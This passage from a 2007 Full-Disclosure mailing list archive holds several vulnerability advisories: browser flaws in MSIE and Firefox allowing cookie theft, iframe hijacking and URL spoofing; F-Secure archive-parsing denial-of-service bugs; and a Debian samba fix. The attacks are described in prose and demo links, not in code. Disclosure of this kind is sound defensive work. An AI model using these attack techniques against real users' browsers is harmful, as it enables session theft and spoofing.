> Just press ctrl+c and it displays "Getpass error".
> 2 seconds later the screen is unlocked and you`ve access.

I can't reproduce this on either Mac OS X (screen 4.00.03) or Debian (screen 4.00.02) ...

Regards,
Alex

From zeroknock at metaeye.org Tue Jun 5 20:33:48 2007
From: zeroknock at metaeye.org (Aditya K Sood)
Date: Tue, 05 Jun 2007 12:33:48 -0700
Subject: [Full-disclosure] Project CERA : Cutting Edge Research Arena
Message-ID: <4665BA9C.4080408@metaeye.org>

Hi all

Project CERA : Cutting Edge Research Arena is undertaken. The project provides detailed analysis of untamed issues related to Web exploitation, Web penetration and Web security. Due to its wide acceptance it is projected as prime base.

http://cera.metaeye.org

Regards
Aditya K Sood
Zeroknock
http://www.metaeye.org

From lcamtuf at dione.ids.pl Mon Jun 4 12:02:40 2007
From: lcamtuf at dione.ids.pl (Michal Zalewski)
Date: Mon, 4 Jun 2007 13:02:40 +0200 (CEST)
Subject: [Full-disclosure] Assorted browser vulnerabilities
Message-ID:

Hello,

Will keep it brief.
A couple of browser bugs, fresh from the oven, hand crafted with love:

1) Title  : MSIE page update race condition (CRITICAL)
   Impact : cookie stealing / setting, page hijacking, memory corruption
   Demo   : http://lcamtuf.coredump.cx/ierace/

   ...aka the bait & switch vulnerability.

   When Javascript code instructs MSIE6/7 to navigate away from a page that meets same-domain origin policy (and hence can be scriptually accessed and modified by the attacker) to an unrelated third-party site, there is a window of opportunity for concurrently executed Javascript to perform actions with the permissions for the old page, but actual content for the newly loaded page, for example:

     - Read or set victim.document.cookie,
     - Arbitrarily alter document DOM, including changing form submission URLs, injecting code,
     - Read or write DOM structures that were not fully initialized, prompting memory corruption and browser crash.

   This is tested on MSIE6 and MSIE7, fully patched.

2) Title    : Firefox Cross-site IFRAME hijacking (MAJOR)
   Impact   : keyboard snooping, content spoofing, etc
   Demo     : http://lcamtuf.coredump.cx/ifsnatch/
   Bugzilla : https://bugzilla.mozilla.org/show_bug.cgi?id=382686 [May 30]

   Javascript can be used to inject malicious code, including key-snooping event handlers, on pages that rely on IFRAMEs to display contents or store state data / communicate with the server.

   This is related to a less severe variant independently reported by Ronen Zilberman two weeks earlier (bug 381300).

3) Title    : Firefox file prompt delay bypass (MEDIUM)
   Impact   : non-consensual download or execution of files
   Demo     : http://lcamtuf.coredump.cx/ffclick2/
   Bugzilla : https://bugzilla.mozilla.org/show_bug.cgi?id=376473 [Apr 04]

   A sequence of blur/focus operations can be used to bypass delay timers implemented on certain Firefox confirmation dialogs, possibly enabling the attacker to download or run files without user's knowledge or consent.

3) Title  : MSIE6 URL bar spoofing (MEDIUM)
   Impact : mimicking an arbitrary site, possibly including SSL data
   Demo   : http://lcamtuf.coredump.cx/ietrap2/

   MSIE6 vulnerability, similar but unrelated to my earlier onUnload entrapment flaw, allows sites to spoof URL bar data. MSIE7 is not affected because of certain high-level changes in the browser.

From advisories at portcullis-security.com Mon Jun 4 11:49:35 2007
From: advisories at portcullis-security.com (advisories)
Date: Mon, 4 Jun 2007 11:49:35 +0100
Subject: [Full-disclosure] Portcullis Computer Security Ltd - Advisories
Message-ID: <78FA4E96C9E69341989E9416E06225DB010408D2@tgbex.otl.portcullis-security.com>

Hello

Please find attached the above advisories from Portcullis Computer Security Ltd.

Kind Regards

Tracey Parry
Advisories
Portcullis Computer Security Ltd

###############################################################
This email originates from the systems of Portcullis Computer Security Limited, a Private limited company, registered in England in accordance with the Companies Act under number 02763799. The registered office address of Portcullis Computer Security Limited is: The Grange Barn, Pikes End, Pinner, MIDDX, United Kingdom, HA5 2EX. The information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Any opinions expressed are those of the individual and do not represent the opinion of the organisation. Access to this email by persons other than the intended recipient is strictly prohibited. If you are not the intended recipient, any disclosure, copying, distribution or other action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. When addressed to our clients any opinions or advice contained in this email is subject to the terms and conditions expressed in the applicable Portcullis Computer Security Limited terms of business.
###############################################################

#####################################################################################
This e-mail message has been scanned for Viruses and Content and cleared by MailMarshal.
#####################################################################################
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070604/d7f3033c/attachment.html
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: mtusernameenumeration - 06-038.txt
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070604/d7f3033c/attachment.txt
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: mtcookie - 06_033.txt
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070604/d7f3033c/attachment-0001.txt
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: mtdirectory - 06_034.txt
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070604/d7f3033c/attachment-0002.txt
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: mtinjection - 06_035.txt
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070604/d7f3033c/attachment-0003.txt
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: mtphishing - 06_36.txt
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070604/d7f3033c/attachment-0004.txt
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: mtupload - 06_037.txt
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070604/d7f3033c/attachment-0005.txt

From security at nruns.com Mon Jun 4 17:52:21 2007
From: security at nruns.com (security at nruns.com)
Date: Mon, 4 Jun 2007 18:52:21 +0200
Subject: [Full-disclosure] n.runs-SA-2007.014 - F-Secure Antivirus ARJ parsing Infinite Loop Advisory
Message-ID:

n.runs AG
http://www.nruns.com/
security(at)nruns.com
n.runs-SA-2007.014                                          04-Jun-2007
________________________________________________________________________

Vendor: F-Secure Corporation, http://www.f-secure.com

Affected Products:
  F-Secure Anti-Virus for Workstations version 7.00 and earlier
  F-Secure Anti-Virus for Windows Servers version 7.00 and earlier
  F-Secure Anti-Virus for Citrix Servers version 5.52
  F-Secure Anti-Virus for MIMEsweeper version 5.61 and earlier
  F-Secure Anti-Virus Client Security version 7.00 and earlier
  F-Secure Anti-Virus for MS Exchange version 7.00 and earlier
  F-Secure Internet Gatekeeper version 6.60 and earlier
  F-Secure Internet Security 2005, 2006 and 2007
  F-Secure Anti-Virus 2005, 2006 and 2007
  Solutions based on F-Secure Protection Service for Consumers version 7.00 and earlier
  F-Secure Anti-Virus for Linux Servers version 4.65 and earlier
  F-Secure Anti-Virus for Linux Gateways version 4.65 and earlier
  F-Secure Anti-Virus Linux Client Security 5.52 and earlier
  F-Secure Anti-Virus Linux Server Security 5.52 and earlier
  F-Secure Internet Gatekeeper for Linux 2.16 and earlier

Vulnerability: Infinite Loop DoS (remote)
Risk: HIGH
________________________________________________________________________

Vendor communication:

  2007/05/07 initial notification to F-Secure Corporation
  2007/05/08 F-Secure Corporation Response
  2007/05/08 PGP public keys exchange
  2007/05/08 PoC files sent to F-Secure Corporation
  2007/05/14 F-Secure Corporation acknowledged the PoC files
  2007/05/18 F-Secure Corporation validate the Vulnerability
  2007/05/18 F-Secure Corporation notify update release date
  2007/05/30 F-Secure Corporation released Update with fixes
________________________________________________________________________

Overview:

F-Secure Corporation protects consumers and businesses against computer viruses and other threats from the Internet and mobile networks. F-Secure award-winning solutions are available for workstations, gateways, servers and mobile phones. They include antivirus and desktop firewall with intrusion prevention, antispam and antispyware solutions, as well as network control solutions for Internet Service Providers. F-Secure protection is also available as a service through major ISPs, such as France Telecom, TeliaSonera, PCCW and Charter Communications. F-Secure is the global market leader in mobile phone protection provided through mobile operators, such as T-Mobile and Swisscom and mobile handset manufacturers such as Nokia.

Description:

A remotely exploitable vulnerability has been found in the files parsing engine.

In detail, the following flaw was determined:

- Infinite Loop in .ARJ files parsing

Impact:

This problem can lead to remote denial of service provoked by high CPU consume and exhaustion of storage resource if an attacker carefully crafts a file that exploits the aforementioned vulnerability. The vulnerability is present in F-Secure Corporation software products above mentioned in all platforms supported by the affected products.

Solution:

The vulnerability was reported on 07.May.2007 and an update has been issued on 30.May.2007 to solve this vulnerability. For detailed information about the fixes follow the link in References [1] section of this document.
________________________________________________________________________

Credit:

Bugs found by Sergio Alvarez of n.runs AG.
________________________________________________________________________ References: http://www.f-secure.com/security/fsc-2007-3.shtml [1] This Advisory and Upcoming Advisories: http://www.nruns.com/parsing-engines-advisories.php ________________________________________________________________________ Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact security at nruns.com for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall n.runs be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages. Copyright 2007 n.runs AG. All rights reserved. Terms of apply. From security at nruns.com Mon Jun 4 17:55:52 2007 From: security at nruns.com (security at nruns.com) Date: Mon, 4 Jun 2007 18:55:52 +0200 Subject: [Full-disclosure] n.runs-SA-2007.015 - F-Secure Antivirus FSG packed files parsing Infinite Loop Advisory Message-ID: n.runs AG http://www.nruns.com/ security(at)nruns.com n.runs-SA-2007.015 04-Jun-2007 ________________________________________________________________________ Vendor: F-Secure Corporation, http://www.f-secure.com Affected Products: F-Secure Anti-Virus for Workstations version 7.00 and earlier F-Secure Anti-Virus for Windows Servers version 7.00 and earlier F-Secure Anti-Virus for Citrix Servers version 5.52 F-Secure Anti-Virus for MIMEsweeper version 5.61 and earlier F-Secure Anti-Virus Client Security version 7.00 and earlier F-Secure Anti-Virus for MS Exchange version 7.00 and earlier F-Secure Internet Gatekeeper version 6.60 and earlier F-Secure Internet Security 2005, 2006 and 2007 F-Secure Anti-Virus 2005, 2006 and 2007 Solutions based on F-Secure Protection Service for Consumers version 7.00 and earlier F-Secure Anti-Virus for Linux 
Servers version 4.65 and earlier F-Secure Anti-Virus for Linux Gateways version 4.65 and earlier F-Secure Anti-Virus Linux Client Security 5.52 and earlier F-Secure Anti-Virus Linux Server Security 5.52 and earlier F-Secure Internet Gatekeeper for Linux 2.16 and earlier Vulnerability: Infinite Loop DoS (remote) Risk: HIGH ________________________________________________________________________ Vendor communication: 2007/05/07 initial notification to F-Secure Corporation 2007/05/08 F-Secure Corporation Response 2007/05/08 PGP public keys exchange 2007/05/08 PoC files sent to F-Secure Corporation 2007/05/14 F-Secure Corporation acknowledged the PoC files 2007/05/18 F-Secure Corporation validate the Vulnerability 2007/05/18 F-Secure Corporation notify update release date 2007/05/30 F-Secure Corporation released Update with fixes ________________________________________________________________________ Overview: F-Secure Corporation protects consumers and businesses against computer viruses and other threats from the Internet and mobile networks. F-Secure award-winning solutions are available for workstations, gateways, servers and mobile phones. They include antivirus and desktop firewall with intrusion prevention, antispam and antispyware solutions, as well as network control solutions for Internet Service Providers. F-Secure protection is also available as a service through major ISPs, such as France Telecom, TeliaSonera, PCCW and Charter Communications. F-Secure is the global market leader in mobile phone protection provided through mobile operators, such as T-Mobile and Swisscom and mobile handset manufacturers such as Nokia. Description: A remotely exploitable vulnerability has been found in the files parsing engine. 
In detail, the following flaw was determined: - Infinite Loop in FSG packed files parsing Impact: This problem can lead to remote denial of service provoked by high CPU consume and exhaustion of storage resource if an attacker carefully crafts a file that exploits the aforementioned vulnerability. The vulnerability is present in F-Secure Corporation software products above mentioned in all platforms supported by the affected products. Solution: The vulnerability was reported on 07.May.2007 and an update has been issued on 30.May.2007 to solve this vulnerability. For detailed information about the fixes follow the link in References [1] section of this document. ________________________________________________________________________ Credit: Bugs found by Sergio Alvarez of n.runs AG. ________________________________________________________________________ References: http://www.f-secure.com/security/fsc-2007-3.shtml [1] This Advisory and Upcoming Advisories: http://www.nruns.com/parsing-engines-advisories.php ________________________________________________________________________ Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact security at nruns.com for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall n.runs be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages. Copyright 2007 n.runs AG. All rights reserved. Terms of apply. 
From jmm at debian.org Mon Jun 4 20:37:12 2007 From: jmm at debian.org (Moritz Muehlenhoff) Date: Mon, 4 Jun 2007 21:37:12 +0200 Subject: [Full-disclosure] [SECURITY] [DSA 1291-4] New samba packages fix regression Message-ID: <20070604193712.GA3810@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1291-4 security at debian.org http://www.debian.org/security/ Moritz Muehlenhoff June 4th, 2007 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : samba Vulnerability : several Problem type : remote Debian-specific: no CVE Id(s) : CVE-2007-2444 CVE-2007-2446 CVE-2007-2447 The security update for CVE-2007-2446 introduced a regression, which broke connection to domain member servers in some scenarios. This update fixes this regression. For the stable distribution (etch), this regression has been fixed in version 3.0.24-6etch4. The old stable distribution (sarge) is not affected by this problem. For the unstable distribution (sid) this regression has been fixed in version 3.0.25a-1. We recommend that you upgrade your samba package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. 

Debian GNU/Linux 4.0 alias etch
- -------------------------------